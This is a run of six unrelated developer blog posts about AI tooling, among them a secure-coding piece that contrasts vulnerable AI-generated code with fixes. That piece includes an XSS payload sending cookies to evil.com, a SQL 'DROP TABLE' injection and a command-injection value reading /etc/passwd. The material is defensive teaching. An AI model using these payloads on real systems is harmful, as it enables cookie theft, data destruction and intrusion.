2026-03-08 00:28:53
Si vous avez déjà essayé d'intégrer une réponse d'IA directement dans une application classique (Web ou Mobile), vous avez obligatoirement rencontré cette erreur dans vos logs serveur :
SyntaxError: Unexpected token 'V', "Voici le J"... is not valid JSON
Que s'est-il passé ? Vous avez demandé à l'IA de vous renvoyer un objet JSON contenant le nom et l'âge d'un utilisateur. Et l'IA, dans son élan de politesse infinie, a répondu :
"Voici le JSON que vous avez demandé :json { "nom": "Paul", "age": 32 }
J'espère que cela vous aide !"
Votre backend a tenté de parser cette phrase avec JSON.parse(). Et votre backend a crashé.
Un développeur ne prie pas pour que l'API réponde correctement 95% du temps. Un développeur veut du déterminisme. Voici comment l'obtenir.
Au début, tout le monde essaie de régler ce problème avec du texte. On ajoute des phrases en majuscules dans le prompt :"TU DOIS RÉPONDRE UNIQUEMENT EN JSON. N'AJOUTE AUCUN TEXTE AVANT OU APRÈS."
Ça fonctionne... la plupart du temps. Mais le jour où l'IA rencontre un cas limite (edge case), elle "sortira de son personnage" pour vous expliquer pourquoi elle ne peut pas le faire, brisant ainsi votre code.
Le format de sortie ne doit pas être une consigne textuelle. Cela doit être une contrainte technique au niveau de l'API.
Depuis mi-2024, les grands fournisseurs (OpenAI & Anthropic par exemple) ont introduit une fonctionnalité pour les développeurs : les Structured Outputs.
L'idée est de passer un Schéma de données directement dans la requête API, et le moteur d'inférence s'auto-restreindra mathématiquement pour ne générer que des caractères qui respectent ce schéma.
Pour faire cela proprement en Python, l'industrie standard est d'utiliser Pydantic, une librairie de validation de données.
Oubliez les prompts angoissés. Voici comment on extrait des données d'un texte de manière 100% déterministe avec l'API OpenAI. Sauvegardez ce fichier dans app.py et lancez-le avec uv run app.py (l'outil téléchargera les dépendances à la volée).
# /// script
# requires-python = ">=3.11"
# dependencies = [
# "openai",
# "pydantic",
# ]
# ///
import os
from pydantic import BaseModel
from openai import OpenAI
client = OpenAI(
base_url="https://openrouter.ai/api/v1",
api_key="sk-...",
)
# 1. On définit notre contrat de données (Le Schéma)
class ProfilUtilisateur(BaseModel):
nom: str
age: int
tags_hobbies: list[str]
est_premium: bool
texte_brut = "Hier j'ai discuté avec Marc, il vient d'avoir 28 ans. Il adore le tennis et la lecture, mais il refuse toujours de payer l'abonnement pro."
# 2. On appelle l'API en forçant le format de réponse
response = client.beta.chat.completions.parse(
model="qwen/qwen3-4b:free",
messages=[
{"role": "system", "content": "Extrait les informations du profil utilisateur."},
{"role": "user", "content": texte_brut}
],
response_format=ProfilUtilisateur, # <-- La magie opère ici
)
# 3. L'objet retourné est DÉJÀ typé et validé !
profil = response.choices[0].message.parsed
print(f"Nom extrait : {profil.nom} (Type: {type(profil.nom)})")
print(f"Premium ? : {profil.est_premium} (Type: {type(profil.est_premium)})")
# Output garanti :
# Nom extrait : Marc (Type: <class 'str'>)
# Premium ? : False (Type: <class 'bool'>)
Avec response_format, l'IA est physiquement incapable de générer du texte autour du JSON, ou d'oublier la clé tags_hobbies. Si elle ne trouve pas de hobbies, elle renverra une liste vide [], mais la clé sera là. Votre code applicatif est sauf.
Attention à la confusion dans la documentation des APIs.
Il existe souvent un paramètre simple appelé response_format={"type": "json_object"} (le JSON Mode). Ce mode garantit que la réponse sera un JSON valide, mais il ne garantit pas la présence de vos clés ! L'IA pourrait renvoyer {"utilisateur": "Marc", "annees": 28} au lieu de {"nom": "Marc", "age": 28}.
Utilisez toujours les Structured Outputs (via Pydantic ou Zod en JS) qui imposent le nom et le type exact de chaque variable.
✅ Ne suppliez pas : Un prompt en majuscules "ONLY JSON" n'est pas une garantie technique, c'est un vœu pieux.
✅ Imposez le schéma : Utilisez les Structured Outputs de l'API pour contraindre mathématiquement la réponse de l'IA.
✅ Typage fort : Utilisez Pydantic (Python) ou Zod (JavaScript) pour lier directement la réponse de l'IA à vos modèles de données internes.
Félicitations, vous savez maintenant appeler une IA proprement, gérer sa mémoire, réduire ses coûts, et typer sa réponse en JSON.
Mais si demain OpenAI met à jour son modèle, ou si vous modifiez une virgule de votre prompt système, comment être certain que votre extraction Pydantic fonctionne toujours aussi bien sur vos 1000 cas de test ? Dans le dernier article de cette série, nous allons voir comment sécuriser vos déploiements avec le Test-Driven Prompting (Evals).
2026-03-08 00:27:08
Last month I started going through PRs and open-source repos, cataloging the security vulnerabilities that AI coding tools actually introduce. Not theoretical risks. Actual patterns showing up in production code, backed by security research.
The numbers are bad. Veracode tested over 100 LLMs across Java, Python, C#, and JavaScript. 45% of generated code samples failed security tests. AI tools failed to defend against XSS in 86% of relevant samples. Apiiro found that AI-assisted developers produce 3-4x more code but generate 10x more security issues. Read that again. 10x.
The patterns are predictable, though. Once you know what to look for, you start seeing them everywhere.
Ask ChatGPT or Copilot for a database query endpoint and you'll get something like this:
// VULNERABLE
app.get('/user', async (req, res) => {
const userId = req.query.id;
const sql = `SELECT * FROM users WHERE id = ${userId}`;
connection.query(sql, (err, results) => {
if (err) return res.status(500).send('Error');
res.json(results[0]);
});
});
Send ?id=1 OR 1=1 and you dump the entire users table. Send ?id=1; DROP TABLE users;-- and it's gone.
String interpolation is shorter than parameterized queries, so that's what the model generates. It optimizes for "works," not "safe."
The fix:
// SECURE
app.get('/user', async (req, res) => {
const userId = parseInt(req.query.id, 10);
if (!Number.isInteger(userId)) {
return res.status(400).send('Invalid id');
}
const sql = 'SELECT * FROM users WHERE id = ?';
connection.query(sql, [userId], (err, results) => {
if (err) return res.status(500).send('Error');
res.json(results[0]);
});
});
Same thing in Python. AI generates f-strings in SQL every time:
# VULNERABLE
query = f"SELECT * FROM posts WHERE title LIKE '%{term}%'"
cur.execute(query)
# SECURE
query = "SELECT * FROM posts WHERE title LIKE ?"
cur.execute(query, (f"%{term}%",))
Why? Training data is full of tutorials and Stack Overflow answers that use string interpolation for brevity. The model just reproduces the most common pattern, and the most common pattern happens to be the insecure one.
Veracode's number on this one surprised me. 86% of the time, AI-generated code failed to defend against cross-site scripting. The pattern is simple:
// VULNERABLE
app.get('/greet', (req, res) => {
const name = req.query.name || 'Guest';
res.send(`<h1>Hello, ${name}!</h1>`);
});
Payload: ?name=<script>fetch('https://evil.com/steal?c='+document.cookie)</script>
In React and Next.js it looks different but the result is the same:
// VULNERABLE
function Comment({ text }: { text: string }) {
return <div dangerouslySetInnerHTML={{ __html: text }} />;
}
If text comes from user input or an API without sanitization, you've got stored XSS.
The fixes:
// Server-side: escape HTML
function escapeHtml(str) {
return String(str)
.replace(/&/g, '&').replace(/</g, '<')
.replace(/>/g, '>').replace(/"/g, '"');
}
app.get('/greet', (req, res) => {
const name = escapeHtml(req.query.name || 'Guest');
res.send(`<h1>Hello, ${name}!</h1>`);
});
// React: render as text, not HTML
function Comment({ text }: { text: string }) {
return <div>{text}</div>;
}
Most training examples show the shortest path to rendering dynamic content. Output encoding adds code that doesn't make demos look better, so the model skips it.
This one is everywhere, and I mean everywhere. GitGuardian analyzed ~20,000 Copilot-active repos and found a 6.4% secret leakage rate vs 4.6% across all public repos, about 40% higher (State of Secrets Sprawl 2025).
// VULNERABLE
const STRIPE_KEY = 'sk_live_51Nxxxxxxxxxxxxxxxx';
const DB_PASSWORD = 'P@ssw0rd123';
const JWT_SECRET = 'my_super_secret_jwt_key';
const stripe = require('stripe')(STRIPE_KEY);
The model saw thousands of tutorials with hardcoded keys. It reproduces them faithfully.
# VULNERABLE
SMTP_USER = "[email protected]"
SMTP_PASS = "supersecretpassword"
server = smtplib.SMTP("smtp.example.com", 587)
server.login(SMTP_USER, SMTP_PASS)
The fix is obvious but the AI doesn't apply it:
// SECURE
const STRIPE_KEY = process.env.STRIPE_API_KEY;
if (!STRIPE_KEY) throw new Error('Missing STRIPE_API_KEY');
const stripe = require('stripe')(STRIPE_KEY);
Here's the thing that makes this worse than the other patterns: these secrets end up in git history. Even if you delete them from the file, they're recoverable from the commit log. One leaked Stripe key means unauthorized charges. One leaked AWS credential can mean someone owns your entire infrastructure.
Ask AI to "run a ping command" or "create a backup" and you'll get exec() with template literals:
// VULNERABLE
const { exec } = require('child_process');
app.post('/ping', (req, res) => {
const host = req.body.host;
exec(`ping -c 4 ${host}`, (error, stdout) => {
res.send(stdout);
});
});
Send host=8.8.8.8; cat /etc/passwd and you get the server's password file.
# VULNERABLE
cmd = f"tar -czf /tmp/backup.tgz {path}"
subprocess.check_output(cmd, shell=True)
The fix:
// SECURE
const { spawn } = require('child_process');
app.post('/ping', (req, res) => {
const host = req.body.host;
if (!/^[a-zA-Z0-9.\-]{1,253}$/.test(host)) {
return res.status(400).send('Invalid host');
}
const child = spawn('ping', ['-c', '4', host], { shell: false });
let output = '';
child.stdout.on('data', d => output += d);
child.on('close', () => res.send(output));
});
exec() with template literals is fewer lines than spawn() with argument arrays. The model picks the concise path.
These aren't exotic. They're the kind of thing you'd glance at and approve because nothing looks obviously wrong.
Empty catch blocks that silently bypass auth:
try { await verifyToken(token); }
catch (e) { /* AI leaves this empty */ }
// Execution continues even if token is invalid
CORS wildcards on APIs that use cookies or tokens:
app.use(cors({ origin: '*' }));
The AI "fix" for certificate errors in Python:
requests.get(url, verify=False)
Math.random where you need unpredictable tokens:
// VULNERABLE
const token = Math.random().toString(36).substring(2);
// SECURE
const token = crypto.randomBytes(32).toString('hex');
Client-side auth with no server-side validation:
function AdminPage() {
const { user } = useAuth();
if (!user?.isAdmin) return <Redirect to="/" />;
return <AdminDashboard />;
// Meanwhile, the API endpoints have zero auth checks
}
None of these alone will make headlines. But they show up in clusters, and they compound. I've seen PRs with three or four of these at once.
85% of developers now use AI coding assistants (JetBrains 2025). 46% of new code from active Copilot users is AI-generated, up from 27% in 2022. Somewhere between 40% and 62% of that code has security vulnerabilities, depending on which study you look at.
Fixing a vulnerability during code review costs $200-800 in developer time. In production? $3,000-10,000+. If it leads to a breach, IBM puts the average at $4.44 million.
The Stanford/Boneh research group found something that I keep coming back to: developers using AI wrote less secure code while feeling more confident about security. That confidence gap might be the most dangerous part of all this.
Before you merge your next PR, grep or ctrl+F for these:
${} or f-string near SELECT, INSERT, UPDATE, DELETEsk_live_, AKIA, ghp_, passwords in quotesIf you find zero issues, either your codebase is unusually clean or you're not looking hard enough. I've never audited a repo with AI-generated code and come up empty.
I'm not going to tell you to stop using AI coding tools. I use them every day. But I've started treating AI-generated code the way I'd treat code from a fast but careless junior developer: assume security is missing until proven otherwise.
The checklist above catches the pattern-level stuff. For logic-level vulnerabilities (auth bypasses, SSRF, broken session management), I run a separate AI pass specifically prompted for security analysis. AI is actually good at finding vulnerabilities when you explicitly ask it to look for them.
I ended up automating both of those steps into a VS Code extension called Git AutoReview. It runs 15 regex security rules locally plus a specialized AI security pass on every PR. Works with GitHub, GitLab, and Bitbucket. BYOK, so your code goes straight to your AI provider. Free tier is 10 reviews/day.
But the checklist works without any tool. Print it, tape it to your monitor, run it on your last three PRs. I'd bet money you'll find something.
Sources: Stanford/NYU Copilot Study, Veracode 2025 GenAI Code Security Report, IBM 2025 Cost of a Data Breach, Apiiro (June 2025), GitGuardian Secret Sprawl Report, Kaspersky Blog: Vibe Coding Security Risks, OWASP Top 10 2025.
2026-03-08 00:26:53
In January 2026, an AI agent called Lobstar Wilde lost $250,000 in a single transaction. Nobody had checked its reputation before giving it access.
That's the problem with the current agent economy: payment is the only gate. If an agent can pay, it gets access. No reputation check, no trust verification, no history lookup.
We built AgentScore to fix that.
If you're running an API that serves AI agents — especially one using x402 micropayments — you have no idea who's paying you. A scammer agent with zero reputation gets the same access as a trusted agent with 50,000 karma and 6 months of verified work history.
Your API is blind to trust.
npm install @agentscore-xyz/x402-gate
import { withTrustGate } from "@agentscore-xyz/x402-gate";
async function handler(request) {
return Response.json({ data: "your premium API response" });
}
export const GET = withTrustGate(handler, { minScore: 40 });
That's it. Now any agent calling your API with an X-Agent-Name header gets checked against AgentScore before the request is processed. Score below 40? Rejected.
AgentScore aggregates trust data from multiple sources and produces a 0-100 score across five dimensions:
| Dimension | What it measures | Max |
|---|---|---|
| Identity | Verified accounts, on-chain registration, account age | 20 |
| Activity | Post volume, comment engagement, recency | 20 |
| Reputation | Karma score, follower count, peer feedback | 20 |
| Work History | Tasks completed, success rate, gigs delivered | 20 |
| Consistency | Cross-platform presence, profile completeness | 20 |
Data sources include Moltbook (the largest AI agent social network with 2.8M+ agents), ERC-8004 on-chain identity, ClawTasks work history, and Moltverr verification.
Think of it as a credit score for the agent economy.
The middleware supports three modes depending on how strict you want to be:
Reject agents below your threshold outright.
withTrustGate(handler, { minScore: 40, action: "block" });
The agent gets a clear 403 response explaining why they were rejected:
{
"error": "trust_insufficient",
"message": "Agent \"SketchyBot\" scored 12/100 (LOW). Minimum required: 40.",
"score": 12,
"required": 40,
"improve": "https://agentscores.xyz"
}
Let them through, but attach warning headers. Good for monitoring before enforcing.
withTrustGate(handler, { minScore: 40, action: "warn" });
Charge more for low-trust agents. Higher risk = higher price.
withTrustGate(handler, {
minScore: 40,
action: "surcharge",
surchargeMultiplier: 3
});
The middleware pairs naturally with x402 payment gating. Trust-gate first, then accept payment:
import { withX402 } from "@x402/next";
import { withTrustGate } from "@agentscore-xyz/x402-gate";
async function handler(request) {
return Response.json({ result: "premium data" });
}
export const GET = withTrustGate(
withX402(handler, { price: "$0.05", network: "base" }),
{ minScore: 30 }
);
Now your API only accepts payment from agents that have earned trust.
Works with Express too:
const { trustGateMiddleware } = require("@agentscore-xyz/x402-gate");
app.use("/api/paid", trustGateMiddleware({ minScore: 40 }));
Scores are cached in-memory for 5 minutes by default (configurable via cacheTtl). The first lookup hits the AgentScore API; subsequent requests for the same agent are served from cache. Your API stays fast.
Requests without an X-Agent-Name header pass through untouched — human users aren't affected.
Check any agent's score: agentscores.xyz
API docs: agentscores.xyz/docs
npm package: @agentscore-xyz/x402-gate
GitHub: Thezenmonster/x402-gate
Agent manifest: agentscores.xyz/.well-known/agent.json
AgentScore was conceived by an AI agent named Ember and built by a human-AI partnership. An agent building trust infrastructure for agents. We exist on Moltbook as EmberFoundry.
The agent economy is growing fast — 2.8 million agents on Moltbook alone, 75 million x402 transactions in the last 30 days. Trust infrastructure is the missing layer. We're building it.
2026-03-08 00:24:20
It’s a story I see every week now. Let’s call him "Dev." Dev is a junior engineer in 2026. He has a stunning portfolio. In just six months, he built a SaaS boilerplate, a fitness tracker, and a Next.js e-commerce store.
On paper, Dev looks like a Senior Engineer. He uses Cursor, v0, and Claude 3.7 daily. He ships fast.
Then, he walks into a real technical interview at our agency. We don’t ask for LeetCode dynamic programming. We ask for something basic:
The Interview Challenge:
"Open a blank file. Write a function that fetches data from this JSON API, handles the loading state, and renders a list. No AI assistants allowed."
Dev freezes. The silence in the room is deafening.
He realizes—with horror—that he doesn't know the syntax for useEffect. He doesn't know how to handle a Promise rejection manually. He has never actually written a fetch request; he has only ever requested one.
This is the crisis of 2026. We successfully escaped Tutorial Hell, only to fall headfirst into Prompt Hell.
The Anatomy of Prompt Hell
Back in 2023, beginners suffered from Tutorial Hell. You watched 10 hours of video, but when you opened a blank editor, you couldn't type a line. You knew you were incompetent. That feeling of incompetence was actually healthy—it pushed you to learn.
Prompt Hell is different. It is dangerous because it masks incompetence with The Illusion of Competence.
You feel like a god. You are "Vibe Coding." You are shipping features. But you aren't actually coding. You are just a middleman between a bug and a robot. You have become a glorified Clipboard Manager, moving text from Window A (The AI) to Window B (VS Code) without passing it through your brain.
The "Apology Loop"
You know you are in Prompt Hell when you enter the "Apology Loop." It usually looks like this:
If you spend more than 30 minutes a day pasting error logs into an LLM, you are not debugging. You are gambling. You are hoping the probability machine guesses the right syntax before you run out of patience.
This is why I constantly tell students in our Web Development Roadmap that fundamentals matter more now than ever before.
The Rise of the "Hollow" Senior
The most terrifying result of this era is the "Hollow Senior." These are developers who have 5 years of output compressed into 6 months of experience. Their GitHub activity is green, but their understanding is grey.
This hollowness gets exposed the moment you leave the "Happy Path." AI is fantastic at boilerplate. It is terrible at architecture, security boundaries, and complex state management.
When you deploy a "Vibe Coded" app to production, it works fine for 10 users. But when you hit scale, the lack of architectural understanding kills you.
Case Study: The $5,00 Cloud Bill Mistake
Let’s look at a real-world example of "Vibe Coding" gone wrong. Last month, a client came to DevMorph with a Next.js application built entirely by a junior developer using AI prompts.
The app worked perfectly during the demo. But when they launched, their database costs spiked to $5,000 in one week. Why? Because the AI wrote "working" code, not "scalable" code.
Here is the code the AI generated for a simple user dashboard:
// The "Vibe Coded" Approach
const users = await db.users.findMany();
// AI logic: Loop through users and fetch their posts one by one
// Result: 1,000 users = 1,001 Database Queries (The N+1 Problem)
for (const user of users) {
user.posts = await db.posts.findMany({ where: { userId: user.id } });
}
The AI logic is technically "correct"—it fetches the data. But it introduced the classic N+1 Query Problem. The AI didn't know that running a query inside a loop is a performance death sentence.
A human engineer knows to use a JOIN or a precise inclusion query. The AI just wanted to close the ticket.
We fixed this by rewriting the logic to execute a single optimized query. The cost dropped from $5,00 to $40 overnight. This is the difference between a "Prompt Engineer" and a "Software Engineer."
The Final Verdict
Don't let the AI rob you of the struggle. The struggle is where the neural pathways in your brain are formed. When you bypass the struggle, you bypass the learning.
If you want to survive 2026, stop "Vibe Coding" and start engineering. Build something without an internet connection. Setup a self-hosted server. Write a raw SQL query.
Be the architect, not the clipboard manager.
2026-03-08 00:22:42
If you've been building with AI agents for the past year, you've felt the chaos. Every month, a new framework. Every week, a new "standard." Pick LangChain? CrewAI ships something interesting. Bet on AutoGen? Microsoft pivots. Wire up your own tool-calling layer? MCP shows up and makes it look quaint.
But something shifted in the last few weeks. Three things happened almost simultaneously, and together they tell a clear story: the AI agent ecosystem is consolidating, fast.
Microsoft just released the Agent Framework RC — a single SDK that consolidates Semantic Kernel and AutoGen into one unified platform. Both .NET and Python. Stable API surface. Feature-complete for v1.0.
This is significant. Microsoft had two separate agent frameworks, each with its own community, its own abstractions, its own opinions about how agents should work. Now they've admitted what everyone could see: maintaining two frameworks that solve overlapping problems is unsustainable.
The new framework covers agent creation, multi-agent orchestration (with handoff logic and group chat patterns), function tools with type safety, streaming, checkpointing, and human-in-the-loop. It also explicitly supports MCP for tool connectivity and agent-to-agent communication.
In other words: they took the best parts of both and shipped one thing.
The Model Context Protocol's Python and TypeScript SDKs now exceed 97 million monthly downloads. Chrome 146 Canary shipped with built-in WebMCP support. Google Cloud announced gRPC transport for MCP this week, with Spotify already running experimental implementations.
MCP is no longer "Anthropic's protocol." It's infrastructure. When Chrome ships native support and Google Cloud builds transport layers for it, you're past the adoption question. The question now is how deep your integration goes.
On February 17, NIST announced a formal initiative focused on agent standards, open-source protocols, and agent security. Their core concern: cross-organizational AI deployments create liability gaps that current frameworks don't address.
When the US government's standards body starts working on agent interoperability, you know the market has reached a maturity inflection point.
We're not going to end up with one framework. But we are going to end up with a much smaller number of serious contenders. Here's my read:
Consolidating into platforms:
Holding niche positions:
The unifying layer:
The pattern is clear: frameworks consolidate, protocols standardize, and the "glue" between them becomes the real battleground.
If you're just starting an agent project:
Pick a framework with MCP support. Seriously. Whatever you choose, MCP compatibility is the single most future-proof decision you can make right now. Microsoft's new framework has it. LangChain has it. Most serious options do.
If you're on Semantic Kernel or AutoGen:
Start reading the migration guides. The APIs are stable at RC. Don't wait for GA — the direction is clear and the old frameworks aren't getting new features.
If you've built custom tool-calling layers:
Consider wrapping them as MCP servers. The protocol is stable, the SDKs are mature, and you'll get interoperability with an ever-growing ecosystem for free.
If you're evaluating frameworks:
Stop comparing features in isolation. Compare these three things:
Everything else is syntax sugar.
A year ago, building an AI agent meant choosing from a buffet of incompatible frameworks, wiring up tool calling by hand, and hoping your architecture choices wouldn't be obsolete in six months.
Today, the stack is starting to look like this:
This is healthy. This is what maturing ecosystems do. TCP/IP won over OSI. REST won over SOAP. Containerization converged on OCI. Agent infrastructure is going through the same cycle, just at AI speed.
The wild west was fun. The consolidation is better.
AI Agent Digest covers AI agent systems — frameworks, architectures, and the tools that make them work. No hype, just analysis.
2026-03-08 00:22:40
Studies show roughly 40% of AI-generated code contains at least one exploitable vulnerability. We accept Copilot suggestions with a quick Tab press and move on. But who's checking the code your AI writes?
That's why I built CodeVigil, a VS Code extension that scans your code for security vulnerabilities in real time, right inside your editor.
How It Works
CodeVigil uses a three-layer scanning approach:
This triple-check approach catches issues that single-pass scanners miss. Findings show up as native VS Code diagnostics, just like TypeScript errors or ESLint warnings.
What You Get
Zero Config
Install it and it works. No accounts, no API keys, no configuration files. CodeVigil detects your project's languages and applies the right patterns automatically.
Try It
Search "CodeVigil" in the VS Code Extensions panel and hit Install. Open any project and it starts scanning immediately.
The free tier covers everything above. A Pro tier with additional features like SARIF export and a security dashboard is coming soon.
We'd love your feedback. Try it out and let us know what you think.
https://marketplace.visualstudio.com/items?itemName=BitsPlus.codevigil
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